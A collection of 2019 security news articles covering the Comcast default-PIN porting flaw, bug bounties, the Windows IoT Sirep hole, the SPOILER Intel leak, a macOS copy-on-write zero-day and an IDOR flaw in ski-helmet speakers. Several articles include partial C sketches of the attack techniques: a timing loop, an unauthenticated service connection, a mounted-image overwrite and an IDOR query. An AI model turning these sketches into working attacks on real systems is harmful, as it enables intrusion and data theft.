Comcast security nightmare: default ‘0000’ PIN on everybody’s account

In 2017, Comcast launched Xfinity Mobile: a wireless service that runs on Verizon’s network and on Comcast’s own Wi-Fi hotspots.

To make it easy for customers to port their existing phone numbers over from other carriers, the company used a shortcut: no PINs needed. Oh, except for one default PIN of “0000,” that is, which made it dead simple for crooks to hijack people’s phone numbers.

The glaring security gaffe came to light after multiple customers reported that their numbers had been ported without authorization, that the hijackers had switched the numbers to their own accounts, and that the crooks then carried out identity theft.

One of the ripped-off customers wrote to a Washington Post columnist who addresses readers’ tech problems. From the column, which appeared on Thursday:

‘This is a security hole large enough to drive a truck through,’ reader Larry Whitted in Lodi, Calif., wrote last week.

As a customer of Comcast’s Xfinity Mobile phone service, Whitted says someone was able to hijack his phone number, port it to a new account on another network and commit identity fraud. The fraudster loaded Samsung Pay onto the new phone with Whitted’s credit card – and went to the Apple Store in Atlanta and bought a computer, he said.

The core of the problem: Comcast doesn’t protect its mobile accounts with a unique PIN. (Comcast’s help site for switching carriers suggests this is to make things easier: ‘We don’t require you to create an account PIN, so you don’t need to provide that information to your new carrier.’) The default it uses instead is…. 0000.

To port your phone number, you need two things: your Comcast mobile account number, and a PIN that should, in theory, verify that it’s really you, the legitimate account holder, looking to port your own number. Comcast apparently sought to make it easier for customers by appearing to make the process PIN-less. But it didn’t make the PIN go away: reportedly, it just set a default PIN of 0000 for all customers … a PIN that customers couldn’t change.

All an attacker had to do was get hold of a victim’s account number, then plug in those 4 zeroes, and presto! Stolen account, ported to another carrier.

Last week, Comcast edited its help page to get rid of references to the account PIN.

What it says now:

When you contact your new carrier to transfer your number, they will want your current address and Xfinity Mobile account number

Password reuse again rears its ugly head

Comcast told Ars Technica that fewer than 30 customers were hit by the security snafu, and that it only affected customers who had reused passwords across multiple sites.

From its statement:

We believe this has only affected customers whose passwords might have been included in previous, non-Comcast related breaches. We recommend that customers use unique, strong passwords. In addition, customers can further protect their Xfinity account by signing up for multi-factor authentication.

Comcast referred to the fraudulent porting of mobile numbers as being “a well-known industry issue and not unique to Xfinity Mobile.” At Naked Security, we’ve covered the issue of phone hijacking, but more along the lines of fraudulent SIM (subscriber identity module) swaps rather than default 0000 PINs. In SIM swaps, crooks talk a mobile phone shop into re-issuing someone else’s SIM, perhaps by using fake ID, by guessing at security questions, or by colluding with a corrupt employee.

In SIM swaps, the fraudsters drain victims’ bank accounts by taking over their mobile phones, then intercepting calls or text messages sent by their banks.

The end result is the same for the Comcast security snafu as it is for SIM swaps: crooks get new laptops or other loot, while victims are left in the lurch, trying to convince somebody that they’re the real account holder.

Comcast says it’s fixed the problem, though it didn’t give details about how, saying that such information could help attackers. The company said it also plans to offer a real PIN-based system, but it didn’t say when we’ll be seeing it.

More from Comcast’s statement:

We have also implemented a solution that provides additional safeguards around our porting process, and we’re working aggressively towards a PIN-based solution. We are reaching out to impacted customers to apologize and work with them to address the issue. We take this very seriously, and our fraud detection and prevention methods, policies and procedures are continually being reviewed, tested and refined.

We’re glad to hear that Comcast is going to require customers to choose a unique PIN when signing up for service. Of course, it could have/should have done that two years ago when it kicked off Xfinity Mobile… but then it wouldn’t have given news outlets another chance to make fun of Kanye West showing off his password of 000000 in the Oval Office.

How to stop the hijackers

Comcast told the Post that a fraudster still needs several pieces of customer information to port a number, including the obscure Xfinity Mobile account number. To get at that account number, users have to log into the Xfinity Mobile web portal using their Comcast password. Comcast doesn’t send out paper bills for Xfinity Mobile accounts, it told Ars, nor does it include the account number in emails to customers.

Given that Comcast blamed password reuse for enabling these attacks, it makes sense to use a unique, strong password for your Comcast account, just as for any other account.

Password managers make creating, storing and using a slew of strong passwords much easier. True, there have been issues reported recently about password managers not scrubbing passwords from memory once they’re no longer being used, but we still believe that the advantages outweigh the issues, which will likely be tidied up through updates anyway.
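For the curious, “create a strong password” boils down to picking characters uniformly at random from a decent-sized set, which is what a password manager does for you behind the scenes. Below is a minimal C sketch of that idea; the character set, the 20-character length and the use of /dev/urandom are illustrative choices of ours, not anything Comcast or any particular password manager prescribes.

/* Minimal sketch: generate a strong, random password from the OS's CSPRNG.
 * Illustrative only -- a password manager does this (plus storage) for you.
 * Assumes a POSIX system with /dev/urandom. */
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    const char charset[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*";
    const size_t setlen = sizeof(charset) - 1;   /* 70 distinct symbols */
    const int length = 20;                       /* roughly 6 bits of entropy per character */
    unsigned char rnd;

    FILE *urandom = fopen("/dev/urandom", "rb");
    if (!urandom) { perror("urandom"); return 1; }

    for (int i = 0; i < length; ) {
        if (fread(&rnd, 1, 1, urandom) != 1) { perror("read"); return 1; }
        /* Rejection sampling: discard bytes that would bias the distribution. */
        if (rnd < (256 / setlen) * setlen) {
            putchar(charset[rnd % setlen]);
            i++;
        }
    }
    putchar('\n');
    fclose(urandom);
    return 0;
}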

Make sure you also use two-factor authentication (2FA) whenever it’s available. That way, even if someone has your password, they still can’t log in as you.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/1JlqJ46bIPE/

Companies are flying blind on cybersecurity

IT managers are flying blind in the battle to protect their companies from cyberattacks, according to a survey released today. The result is that getting pwned is now the rule, rather than the exception.

Sophos, which publishes this blog, worked with market research company Vanson Bourne to survey 3,100 IT managers across the globe. The survey covered companies in 12 countries, and quizzed organizations with as few as 100 users and as many as 5,000, finding that 68% of companies had been hit by a cyberattack in the last year.

The reason surfaced quickly enough: companies can’t see what’s happening on their endpoint devices, which leaves them struggling to prevent attacks, or even to know how and when they happened.

The largest share of threats (37%) is only discovered when it reaches servers, and another 37% are detected on the network. Attacks typically start on endpoint devices, so if companies are only picking them up on the server, that means attackers have already been snooping around the infrastructure for some time. Unfortunately, 17% of IT managers didn’t know exactly how long. Those who did know said that attackers had been on their networks for 13 hours before being detected. That’s plenty of time to steal a juicy batch of data or to plant some nasty ransomware.

Not seeing the beginning of the attack chain also makes it difficult for IT managers to understand how the attack unfolded. One in five IT managers didn’t know how an attacker got in, even after discovering the threat.

This means many companies are making security decisions without having all of the facts, the report said. You can’t plug holes if you don’t know where they are.

This inability to shine a light on attackers leaves IT managers shooting in the dark. Organizations that investigate at least one potential security incident each month spend 48 days every year investigating them. Only 15% of these incidents turn out to be malware infections, meaning that IT employees are spending around 41 days each year investigating non-issues.

Why are people running around in headless chicken mode? One of the biggest challenges in prioritising cybersecurity incidents is a lack of security expertise: 80% of respondents admitted that they need a stronger team in place to detect, investigate, and respond to cybersecurity incidents.

Sophos concluded that securing the endpoint is a good place to start. Survey respondents seemed to agree with it. Endpoint Detection and Response (EDR) is a popular tool for those who realise that they are missing important cybersecurity events – 57% of IT managers are planning to use it, with 39% scheduling its introduction in the next six months.

Just installing the EDR software isn’t enough, though, the survey found, as 54% of respondents who had invested in this cybersecurity tool couldn’t get the full benefit from it. The report suggests that management and skills play a part here. Having managers who understand how to drive these tools is crucial.

However you choose to protect yourself, though, one important message comes through: cyberattacks, while not inevitable, are highly probable. And unless you’ve got a beady eye on your infrastructure, you might well only find out about a compromise when you see your internal emails showing up on Pastebin.

Read the report in full here

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/DHlwXqMr2Lo/

Apple gets bug for free, while HackerOne declares first $1m bug hunter

Get ready for bug bounty whiplash: on one end of the spectrum, we’ve got the world’s first $1 million bug bounty hunter, according to HackerOne; on the other, we’ve got a German teenager who caved and gave Apple a bug for free after initially refusing to do so in protest of the company’s invite-only, iOS-only bounty program.

As far as the rich kid story goes, HackerOne announced on Friday that 19-year-old Santiago Lopez, a self-taught hacker from Argentina, has made history as the first hacker to make $1 million from bug bounties.

That would be cumulative, mind you, not a one-time uber bug. Lopez has been at this a long time, and he’s racked up a long list of bug kills.

Lopez goes by the handle @try_to_hack on HackerOne, an online platform that companies use to receive and manage vulnerability reports. Lopez, who’s been hacking and scoring bug bounties since 2015, has reported over 1,670 valid unique vulnerabilities to companies such as Verizon Media Company, Twitter, WordPress, Automattic, and HackerOne, as well as to private programs.

$42 million paid out since HackerOne debuted

In its 2019 annual report, which it released on Friday, HackerOne said that it paid out $19 million in bounties in 2018: an amount that’s close to the total bounty payouts for all preceding years combined.

In total, by the end of 2018, hackers had earned more than $42 million for valid results over the six years since HackerOne launched, in 2012. Those payouts are coming from planet-wide hacking: While India and the US remain the top hacker locations, more than six African countries had first-time hacker participation in 2018.

They’re hacking their own educations

Lopez is typical of the majority on HackerOne in that he’s self-taught. HackerOne says that 81% of hackers on the platform get their training outside of the classroom, typically learning the craft through blogs and other self-directed educational materials such as Hacker101 – a free class for web security – and publicly disclosed reports.

Just 6% of hackers say that they’ve completed a formal class or certification on hacking.

The top five countries represented by hackers in HackerOne are India, the US, Russia, Pakistan, and the UK: those countries account for a bit more than 51% of all hackers in the HackerOne community.

North America’s deep pockets

As far as financial rewards go, the money mostly flows from North America: of the $42+ million awarded to hackers through 2018 on HackerOne, organizations in just eight countries served as the primary source for more than half of the money, with US- and Canada-based organizations accounting for the lion’s share of bounties, followed by the UK, Germany, Russia, and Singapore.

That money’s flowing away from its past destinations

HackerOne says that hackers from India and the US pocketed 30% of the bug bounties last year. That’s a lot, but it’s on the decline as rewards flow to other countries: hackers from those two countries actually took home 43% of the bounties the year before.

Lopez, in Argentina, is actually typical of the burgeoning talent coming from outside the historically top regions, HackerOne said.

Out of all the world’s hackers, those from Argentina have got to have the strongest financial incentive: according to HackerOne’s 2019 report, bug bounties represent a bigger multiple of the median annual wage in Argentina than in any other country. In the US, for example, bug bounties will get you around 6.4x the median annual wage of a software engineer. In Argentina, that multiplier jumps to an enormous 46.6x.

The young eat bugs for lunch

Young: that’s the profile of the average hacker in the HackerOne community. Nine out of 10 hackers on the platform are under 35. Maybe that’s why they can stay awake long enough to find all these vulnerabilities: HackerOne reports that hackers are spending more hours hacking. More than 40% of the platform’s hackers are spending 20-plus hours per week searching for vulnerabilities.

Hackers need love, too

Yes, money tops the list of answers to “Why do you hack?” But it’s tied, at 14.3%, with the thirst for knowledge, as in, to learn tips and techniques.

When it comes to choosing which company to hack, minimum bounty amounts have notably dropped from the top factor down to fourth place. What motivates hackers more is again that thirst for knowledge, with 59.5% saying that it was the challenge or the opportunity to learn that drew them to a particular company’s bug bounty program.

That was followed by 40.4% who said they liked the company against which they pitted their wits.

After that comes responsiveness, cited by 36.4% of hackers as a reason for choosing to hack a particular company. That underscores what we already know: hackers want to be acknowledged, thanked, or even just to be listened to…

…which brings us to Linus Henze – he whom Apple didn’t reward when he found, and published, a proof of concept he called KeySteal: what he claimed is a zero-day bug that can be exploited by attackers using a malicious app to drain passwords out of Apple’s Keychain password manager.

“I won’t release this.” … Blame Apple.

Henze initially said that he wouldn’t share details with Apple – and yes, the company asked – in protest of the company’s invite-only/iOS-only bounties.

But as of Thursday, Henze had thrown in the towel and decided to help Apple, and most particularly Mac OS users, in spite of the company’s bug program policies.

It might have looked like he was doing it just for money, Henze said, but that’s not the case:

My motivation is to get Apple to create a bug bounty program. I think that this is the best for both Apple and Researchers.

Thanks for releasing the bug, Linus, in spite of the lack of a bug bounty.

You’re right, it’s not just about money. It’s about recognition and responsiveness from the company in question. A bug bounty program is a good way to formalize that respect and responsiveness.

Why does Apple have an invitation-only bug bounty program for iOS, but not for Mac OS? It seems to be a baffling approach to bugs.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/zf7_V1aynyM/

Windows IoT Core exploitable via ethernet

Microsoft’s Internet of Things (IoT) version of Windows is vulnerable to an exploit that could give an attacker complete control of the system, according to a presentation given by a security company over the weekend.

At the WOPR Summit in New Jersey, SafeBreach security researcher Dor Azouri demonstrated an exploit that will allow a connected device to run system-level commands on IoT devices running Microsoft’s operating system.

Windows IoT is effectively the successor to Windows Embedded. The lightweight version of Windows 10 is designed with low-level access for developers in mind and also supports ARM CPUs, which are extensively used in IoT devices. According to the Eclipse Foundation’s 2018 IoT Developer Survey, the operating system accounts for 22.9% of IoT solutions development, featuring heavily in IoT gateways.

How it works

The attack comes with some caveats. According to the whitepaper published yesterday, it only works on stock downloadable versions of the Core edition of Windows IoT, rather than the custom versions that might be used in vendor products. An attacker can also only launch the exploit from a machine directly connected to the target device via an Ethernet cable.

The exploit targets the Hardware Lab Kit (HLK), which is a certification tool used to process hardware tests and send back results. The proprietary protocol that HLK uses is called Sirep, and this is its weak spot. A Sirep test service regularly broadcasts the device’s unique ID on the network to advertise the IoT device’s presence. Windows IoT Core also listens for incoming connections through three open ports on its firewall.

However, incoming connections to the Sirep test service are not authenticated, meaning that any device can communicate with it as long as it is connected via an Ethernet cable rather than wirelessly. Azouri believes that this may be because the IoT testing service was ported from the old Windows Phone operating system, which relied on USB connections.

Unauthenticated devices can send a range of commands via the ports, enabling them to get system information from the device, retrieve files, upload files, and get file information.

Perhaps the most powerful, though, is the LaunchCommandWithOutput command. This takes a program path and command-line parameters, launches the corresponding command on the device with system-level privileges, and returns its output. An attacker can use it to run arbitrary processes on an IoT device from an unauthenticated computer.
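To make the lack of authentication concrete, here is a rough sketch of the precondition described above: a machine on the same Ethernet segment simply opens a TCP connection to one of the device’s open ports and is never challenged for credentials before it can start talking Sirep. The IP address and port number below are placeholders, and the snippet deliberately stops short of the proprietary Sirep framing; the working exploit tooling is SafeBreach’s SirepRAT, not this sketch.

/* Hypothetical sketch of the attack precondition: an Ethernet-adjacent machine
 * connects to the Sirep test service and is never asked for credentials.
 * The address and port below are placeholders, and no Sirep wire format is
 * reproduced here -- see SafeBreach's SirepRAT for the real tooling. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    const char *target_ip = "192.168.1.50";  /* placeholder: IoT Core device on the LAN */
    const int sirep_port  = 29817;           /* placeholder: one of the open service ports */

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) { perror("socket"); return 1; }

    struct sockaddr_in dst = {0};
    dst.sin_family = AF_INET;
    dst.sin_port   = htons(sirep_port);
    inet_pton(AF_INET, target_ip, &dst.sin_addr);

    /* No handshake, token or password precedes command dispatch: the TCP
     * connection itself is effectively the credential. */
    if (connect(sock, (struct sockaddr *)&dst, sizeof(dst)) != 0) {
        perror("connect");
        return 1;
    }
    printf("connected without authenticating; a Sirep-framed request such as\n"
           "LaunchCommandWithOutput could now be sent to run commands as SYSTEM\n");

    close(sock);
    return 0;
}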

The researchers created a Python tool called SirepRAT that allows attackers to exploit the flaw in Windows IoT. They even provided a template file used to pass payloads for different commands, along with examples.

Microsoft’s response

According to the researchers’ WOPR slides, Microsoft told them that it will not address the report, because Sirep is an optional feature on Windows IoT Core and its documentation calls the feature out as a test package. Microsoft reportedly plans instead to…

update the documentation to mention that images running the TestSirep package allow anyone with network access to the device to execute any command as SYSTEM without *any* authentication and that this is by design.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/AB_JOEhQXzQ/

SPOILER alert, literally: Intel CPUs afflicted with simple data-spewing spec-exec vulnerability

Further demonstrating the computational risks of looking into the future, boffins have found another way to abuse speculative execution in Intel CPUs to steal secrets and other data from running applications.

This security shortcoming can be potentially exploited by malicious JavaScript within a web browser tab, or malware running on a system, or rogue logged-in users, to extract passwords, keys, and other data from memory. An attacker therefore requires some kind of foothold in your machine in order to pull this off. The vulnerability, it appears, cannot be easily fixed or mitigated without significant redesign work at the silicon level.

Speculative execution, the practice of allowing processors to perform future work that may or may not be needed while they await the completion of other computations, is what enabled the Spectre vulnerabilities revealed early last year.

In a research paper distributed this month through pre-print service ArXiv, “SPOILER: Speculative Load Hazards Boost Rowhammer and Cache Attacks,” computer scientists at Worcester Polytechnic Institute in the US, and the University of Lübeck in Germany, describe a new way to abuse the performance boost.

The researchers – Saad Islam, Ahmad Moghimi, Ida Bruhns, Moritz Krebbel, Berk Gulmezoglu, Thomas Eisenbarth and Berk Sunar – have found that “a weakness in the address speculation of Intel’s proprietary implementation of the memory subsystem” reveals memory layout data, making other attacks like Rowhammer much easier to carry out.

The researchers also examined Arm and AMD processor cores, but found they did not exhibit similar behavior.

“We have discovered a novel microarchitectural leakage which reveals critical information about physical page mappings to user space processes,” the researchers explain.

“The leakage can be exploited by a limited set of instructions, which is visible in all Intel generations starting from the 1st generation of Intel Core processors, independent of the OS and also works from within virtual machines and sandboxed environments.”


The issue is separate from the Spectre vulnerabilities, and is not addressed by existing mitigations. It can be exploited from user space without elevated privileges.

SPOILER doesn’t stand for anything. In an email to The Register, Daniel (Ahmad) Moghimi explained: “We picked a name that starts with ‘Sp’, since it’s an issue due to speculative execution and it kinda spoils existing security assumptions on modern CPUs.”

SPOILER describes a technique for discerning the relationship between virtual and physical memory by measuring the timing of speculative load and store operations, and looking for discrepancies that reveal memory layout.

“The root cause of the issue is that the memory operations execute speculatively and the processor resolves the dependency when the full physical address bits are available,” said Moghimi. “Physical address bits are security sensitive information and if they are available to user space, it elevates the user to perform other micro architectural attacks.”

Memory madness

Modern processors manage reading and writing to RAM using a memory order buffer to keep track of operations. The buffer is used to perform store instructions – copying data from a CPU register to main memory – in the order they are laid out in executable code, and perform load operations – copying data from main memory to a register – out-of-order, speculatively. It allows the processor to run ahead and speculatively fetch information from RAM into the registers, provided there are no dependency problems, such as a load relying on an earlier store that hasn’t yet completed.

Speculating about a load operation may result in false dependencies if physical address information isn’t available. Intel’s chips perform memory disambiguation to prevent computation on invalid data, arising from incorrect speculation.

They just don’t do it all that well. “The root cause for SPOILER is a weakness in the address speculation of Intel’s proprietary implementation of the memory subsystem which directly leaks timing behavior due to physical address conflicts,” the paper explains.

“Our algorithm fills up the store buffer within the processors with addresses that have the same offset but they are in different virtual pages,” said Moghimi. “Then, we issue a memory load that has the same offset similarly but from a different memory page and measure the time of the load. By iterating over a good number of virtual pages, the timing reveals information about the dependency resolution failures in multiple stages.”
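As a rough illustration of the measurement loop Moghimi describes, the C sketch below issues a burst of stores that share one page offset across different virtual pages, then times a load from the same offset on yet another page. It assumes 4 KiB pages and an x86 time-stamp counter, and it omits the serialization, physical-address aliasing and statistical filtering the real SPOILER code depends on; treat it as a sketch of the idea, not the researchers’ implementation.

/* Rough sketch of the SPOILER-style timing loop: stores to the same page offset
 * on many virtual pages, followed by a timed load from that offset on another
 * page. A slow load hints at a falsely detected store dependency.
 * Assumes x86 (rdtscp) and 4 KiB pages; illustrative only. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <x86intrin.h>   /* __rdtscp, _mm_mfence */

#define PAGE   4096
#define WINDOW 64        /* stores issued before the probing load */

int main(void) {
    /* WINDOW pages to store into, plus one extra page as the load target. */
    uint8_t *buf = aligned_alloc(PAGE, (WINDOW + 1) * PAGE);
    if (!buf) return 1;

    const size_t offset = 0x200;   /* same offset within every page */
    unsigned aux;

    for (int round = 0; round < 16; round++) {
        _mm_mfence();
        /* Fill the store buffer: identical page offset, different virtual pages. */
        for (int i = 0; i < WINDOW; i++)
            buf[i * PAGE + offset] = (uint8_t)i;

        /* Time a load with a matching offset from yet another page. */
        uint64_t t0 = __rdtscp(&aux);
        volatile uint8_t v = buf[WINDOW * PAGE + offset];
        uint64_t t1 = __rdtscp(&aux);
        (void)v;

        printf("round %2d: load latency %llu cycles\n",
               round, (unsigned long long)(t1 - t0));
    }

    free(buf);
    return 0;
}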


SPOILER, the researchers say, will make existing Rowhammer and cache attacks easier, and make JavaScript-enabled attacks more feasible – instead of taking weeks, Rowhammer could take just seconds. Moghimi said the paper describes a JavaScript-based cache prime+probe technique that can be triggered with a click to leak private data and cryptographic keys not protected from cache timing attacks.

Mitigations may prove hard to come by. “There is no software mitigation that can completely erase this problem,” the researchers say. Chip architecture fixes may work, they add, but at the cost of performance.

Intel is said to have been informed of the findings on December 1, 2018. The chip maker did not immediately respond to a request for comment. The paper’s release comes after the 90-day grace period that’s common in the security community for responsible disclosure.

Moghimi doubts Intel has a viable response. “My personal opinion is that when it comes to the memory subsystem, it’s very hard to make any changes and it’s not something you can patch easily with a microcode without losing tremendous performance,” he said.

“So I don’t think we will see a patch for this type of attack in the next five years and that could be a reason why they haven’t issued a CVE.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/spoiler_intel_flaw/

Bad news: Google drops macOS zero-day after Apple misses bug deadline. Good news: It’s fiddly to exploit

Google has publicly disclosed a zero-day flaw in Apple’s macOS after the Cupertino mobe-maker failed to fix the security shortcoming within the ad giant’s 90-day deadline.

The vulnerability itself is relatively minor in terms of danger: it allows malware already running on your Mac, or a rogue logged-in user, to potentially escalate their privileges, and fully take over the computer, by secretly altering the contents of files on user-mounted disks without you noticing. Thus, to exploit the weakness, your computer already has to be compromised, which is pretty much game over for most folks.

However, this is Google dropping a proof-of-concept exploit on a tech rival, and it’s therefore caught everyone’s attention.

No warning

Two of the web goliath’s Project Zero researchers, Meltdown-finder Jann Horn and bug-hunter-extraordinaire Ian Beer, revealed late last week how macOS’s copy-on-write mechanism can be exploited by miscreants to modify files without triggering any sort of alert or warning from the operating system.

This mechanism can, it appears, be exploited as follows: wait for a particular privileged process to open a file on a user-mounted disk by mapping it into its virtual memory; then alter the underlying filesystem of the mounted disk to change the mapped file; and finally force the memory pages holding the mapped file to be evicted from the privileged process by writing to a separate, huge memory-mapped file.

When the victim process reads from its mapped file again, it will pull in the altered data from the filesystem without any notification or warning that the file underneath has changed. It may thus be possible to exploit this to crash the app, or to confuse it into granting privilege escalation.

It’s a long shot, though one that could be taken by a malicious application, code fetched from a dodgy NPM package or GitHub repo, and so on.

Under pressure

“After the destination process has started reading from the transferred memory area, memory pressure can cause the pages holding the transferred memory to be evicted from the page cache,” Horn explained.

“Later, when the evicted pages are needed again, they can be reloaded from the backing filesystem. This means that if an attacker can mutate an on-disk file without informing the virtual management subsystem, this is a security bug.

“MacOS permits normal users to mount filesystem images. When a mounted filesystem image is mutated directly (e.g. by calling pwrite() on the filesystem image), this information is not propagated into the mounted filesystem.”
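A conceptual sketch of that primitive, with placeholder paths and offsets standing in for the real thing, might look like the following. It only shows the shape of the trick: a reader maps a file that lives on a mounted image, while the attacker mutates the raw image file directly with pwrite(), so the change never passes through the virtual memory subsystem. Locating the file’s offset inside the image and forcing page eviction are left out; this is not Horn’s proof-of-concept.

/* Conceptual sketch of the copy-on-write bypass described above. Paths and the
 * file offset are placeholders; locating the target inside the image and
 * forcing eviction via memory pressure are omitted. Not Horn's PoC. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
    /* 1. "Victim" side: map a file that lives on the user-mounted image. */
    int mapped_fd = open("/Volumes/evil-image/target.bin", O_RDONLY);
    if (mapped_fd < 0) { perror("open mapped file"); return 1; }
    char *view = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, mapped_fd, 0);
    if (view == MAP_FAILED) { perror("mmap"); return 1; }
    printf("before: %.16s\n", view);

    /* 2. Attacker side: mutate the raw image underneath the mount. The write
     *    goes to the image file, not through the mounted filesystem, so the
     *    memory-management subsystem is never told the data changed. */
    int image_fd = open("/Users/me/evil-image.dmg", O_WRONLY);
    if (image_fd < 0) { perror("open image"); return 1; }
    off_t target_offset = 0x10000;   /* placeholder: offset of target.bin's data */
    pwrite(image_fd, "pwned-contents!!", 16, target_offset);
    close(image_fd);

    /* 3. Once memory pressure evicts the clean page (e.g. by dirtying a huge
     *    separate mapping, omitted here), re-reading the view silently returns
     *    the attacker's bytes -- no warning is raised to the victim. */
    printf("after eviction, a re-read of the mapping would show the new bytes\n");

    munmap(view, 4096);
    close(mapped_fd);
    return 0;
}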

More concerning than the vulnerability itself is Apple’s response. Horn reported the bug to Sir Jony’s shiny thing factory back in November 2018 with a standard 90-day window for a patch.

Despite putting out multiple security updates for macOS between then and now, the above vulnerability was not patched. While the Project Zero team says that Apple is aware of the issue and has been planning to patch it, the deadline has passed, meaning the bug and its proof-of-concept exploit are now publicly disclosed as a zero-day. It’s not the first time Google has done this, though it’s usually Microsoft that misses the deadline.

On the other hand, the bug is so esoteric, it’s probably way down Apple’s to-do list.

Apple did not respond to a request for comment. Google did not respond, either. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/google_macos_zero_day/

That’s a nice ski speaker you’ve got there. Shame if it got pwned

A set of smart speakers intended for ski helmets is a terrible data-leaking pit of badness, according to a Pen Test Partners researcher who innocently bought himself one of the devices.

“I love snow sports, and I also like my tunes, so purchasing the Outdoor Tech CHIPS smart headphones was a no-brainer,” wrote PTP chap Alan Monie this week. “They fit into audio-equipped helmets and have huge 40mm drivers. Warm ears and good bass.”

The Bluetooth snow helmet speakers were, however, not a good choice for people who value their privacy and security.

“[Think back] to when you used to have to carry your MP3 + your ear buds + your smartphone + your walkie-talkie + heated mittens when you would go ride your local hill,” gushed manufacturer Outdoor Tech’s marketing blurb. The speakers themselves fit inside a ski helmet and also serve as a short-range walkie-talkie – something which Alan discovered was not the innocent feature that it seemed to be on the surface.

“I began setting up a group and noticed that I could see all users. I started searching for my own name and found that I could retrieve every user with the same name in their account,” he said.

By exploiting insecure direct object references (IDOR), Alan was able to:

  • Pull all the users and their email addresses from the API
  • Retrieve their password hashes and plain-text password reset codes
  • View their phone numbers
  • Extract users’ real-time GPS positions
  • Listen to real-time walkie-talkie chats

Even worse, when Alan queried the API with the letter A, intending to find his own name and add it to a user group he wanted to set up, the API returned 19,000 results – every single registered user whose first name started with A. For good measure it also threw in their email addresses.

With some basic poking around in the API using nothing more than his own user-level credentials, Alan wrote that he was able to get hold of other users’ password hashes, their “password reset code and user’s phone number in plain text” as well as listing their real-time GPS locations. He was even able, he said, to get hold of the live stream for other users’ walkie-talkie chats.
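Pen Test Partners didn’t publish the API endpoints, but an insecure-direct-object-reference probe of this kind typically looks something like the hypothetical libcurl sketch below: an ordinary user-level token is attached to a query that should only ever return your own records, yet the server hands back other users’ data. The host name, path, parameter and token are all invented for illustration.

/* Hypothetical IDOR probe. The endpoint, query parameter and token are invented
 * for illustration; the article gives no API details. The point is that an
 * ordinary user-level credential is accepted for a query that returns other
 * users' records. Build with -lcurl. */
#include <curl/curl.h>
#include <stdio.h>

int main(void) {
    curl_global_init(CURL_GLOBAL_DEFAULT);
    CURL *curl = curl_easy_init();
    if (!curl) return 1;

    /* Search for users whose name starts with "A" -- in the reported flaw a
     * query like this returned ~19,000 accounts plus their email addresses. */
    curl_easy_setopt(curl, CURLOPT_URL,
                     "https://api.example-vendor.test/v1/users?name=A");

    /* Ordinary user-level credential; no admin rights involved. */
    struct curl_slist *hdrs =
        curl_slist_append(NULL, "Authorization: Bearer USER_LEVEL_TOKEN");
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs);

    CURLcode rc = curl_easy_perform(curl);   /* response body goes to stdout */
    if (rc != CURLE_OK)
        fprintf(stderr, "request failed: %s\n", curl_easy_strerror(rc));

    curl_slist_free_all(hdrs);
    curl_easy_cleanup(curl);
    curl_global_cleanup();
    return 0;
}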

When PTP contacted Outdoor Tech, the firm’s marketing manager replied once before replies dried up. After a three-week delay, PTP decided to go public with the vulns because it said “the vulnerability hadn’t been acknowledged and no remediation actions had been proposed”.

The cautionary tale sheds light on the risks lurking in interesting and potentially useful smart gadgets. Far from being an Alibaba special, Outdoor Tech does not appear to be some kind of fly-by-night internet vendor mainly motivated to make a fast buck. Its products clearly have a loyal and engaged userbase, as shown by the ongoing development of the CHIPS speakers from their first iteration as a set of in-helmet speakers to today’s Bluetooth-enabled tech. Yet that popularity should also come with some corporate responsibility. Security through obscurity is no security at all – and with a live vuln still in the product, the onus is on Outdoor Tech to fix it, and fast.

Outdoor Tech had not responded to The Register‘s emailed enquiries by the time of publication. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/outdoor_tech_chips_ski_helmet_speakers_vulnerability/

Huawei opens Brussels code-check office: Hey! EU’ve got our guide – love Huawei

Huawei stopped fighting metaphorical fires today to lift the curtain on its Brussels Cyber Security Transparency Centre in a move to position the Chinese company as a driving force for new global security standards.

“We need to work together on unified standards. Based on a common set of standards, technical verification and legal verification can lay the foundation for building trust,” said rotating chairman Ken Hu, giving the inauguration speech for the Huawei Cyber Security Transparency Centre (HCSTC) at Brussels’ Palais des Academies this morning.

Huawei said in a statement that its aim with the HCSTC in Brussels was “to offer government agencies, technical experts, industry associations, and standards organizations a platform, where they can communicate and collaborate to balance out security and development in the digital era”.

The centre will also act as a shop window for Huawei’s security products, focusing on 5G, IoT and cloud. “Independent testing organisations”, as well as telcos and nation states, are, the company said, most welcome to use its “dedicated testing environments”.

EU functionary Ulrik Trolle Smed, who works in the office of EU Security Commissioner Julian King, gave a speech at the event praising the opening of the centre. He said: “We are in favour of anything that leads to better cybersecurity because it’s a collective responsibility.”

Any chumminess displayed by EU institutions towards Huawei is likely to alarm the Anglosphere Five Eyes spying alliance. The Five Eyes countries – America, Australia, the UK, Canada and New Zealand – are almost all against allowing Huawei’s network equipment to be installed in their core networks. The UK, however, has not closed the door on Huawei’s involvement in next-generation mobile networks, despite its oversight panel delivering some muted criticism of its firmware security.

We believe that European regulators are on track to lead the international community in terms of cyber security standards and regulatory mechanisms. We commit to working more closely with all stakeholders in Europe, including regulators, carriers, and standards organizations, to build a system of trust based on facts and verification.

Ken Hu, Huawei rotating chairman

Hu called for a “collaborative effort” on cybersecurity from both governments and industry “because no single vendor, government, or telco operator can do it alone”, going on to praise the GSMA’s Network Equipment Security Assurance Scheme: “We believe that all stakeholders should get behind this framework. Ultimately, the standards we adopt must be verifiable for all technology providers and all carriers.”

The HCSTC currently employs “around eight to 10 people” according to a company spokesman who gave a brief tour of its offices, located in a nondescript block on Gruinard 9. The company is pitching the centre as a UK-style code review facility, open to telcos and states alike, and a platform for influencing the European Union’s renewed drive to improve cyber security standards.

